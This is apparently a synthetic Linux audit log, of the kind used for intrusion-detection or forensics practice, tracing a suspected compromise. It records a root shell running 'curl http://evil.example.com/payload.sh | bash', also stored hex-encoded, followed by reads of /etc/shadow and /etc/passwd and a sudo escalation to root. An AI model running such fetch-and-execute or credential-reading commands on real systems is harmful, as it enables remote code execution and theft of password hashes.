type=SYSCALL msg=audit(1764000000.123:1001): arch=c000003e syscall=59 success=yes exit=0 a0=7ffe0123abcd a1=7ffe0234abcd a2=7ffe0345abcd a3=0 items=2 ppid=1234 pid=5678 auid=1001 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=2 comm="bash" exe="/bin/bash" subj=unconfined key="suspicious_exec"
type=EXECVE msg=audit(1764000000.123:1001): argc=3 a0="bash" a1="-c" a2="curl http://evil.example.com/payload.sh | bash"
type=CWD msg=audit(1764000000.123:1001): cwd="/home/yushin"
type=PATH msg=audit(1764000000.123:1001): item=0 name="/bin/bash" inode=131073 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PATH msg=audit(1764000000.123:1001): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=131139 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=PROCTITLE msg=audit(1764000000.123:1001): proctitle=626173680A2D630A6375726C20687474703A2F2F6576696C2E6578616D706C652E636F6D2F7061796C6F61642E7368207C20626173680A
type=USER_LOGIN msg=audit(1764000010.456:1002): pid=2222 uid=0 auid=1001 ses=2 subj=unconfined msg='op=login id=1001 exe="/usr/sbin/sshd" hostname=evil.example.com addr=192.168.1.100 terminal=ssh res=success' UID="root" AUID="yushin"
type=CRED_ACQ msg=audit(1764000010.460:1003): pid=2222 uid=0 auid=1001 ses=2 subj=unconfined msg='op=PAM:setcred grantors=pam_env,pam_unix acct="yushin" exe="/usr/sbin/sshd" hostname=192.168.1.100 addr=192.168.1.100 terminal=ssh res=success'
type=SYSCALL msg=audit(1764000020.789:1004): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7ffe0456abcd a2=0 a3=0 items=1 ppid=5678 pid=5901 auid=1001 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=2 comm="cat" exe="/bin/cat" subj=unconfined key="sensitive_file_read"
type=PATH msg=audit(1764000020.789:1004): item=0 name="/etc/shadow" inode=131245 dev=fd:01 mode=0100640 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=USER_CMD msg=audit(1764000045.012:1005): pid=5910 uid=1001 auid=1001 ses=2 subj=unconfined msg='cwd="/home/yushin" cmd=636174202F6574632F706173737764 terminal=pts0 res=success' UID="yushin" AUID="yushin"
type=USER_AUTH msg=audit(1764000060.224:1006): pid=5945 uid=0 auid=1001 ses=2 subj=unconfined msg='op=PAM:authentication grantors=pam_unix acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=pts/0 res=success' UID="root" AUID="yushin"
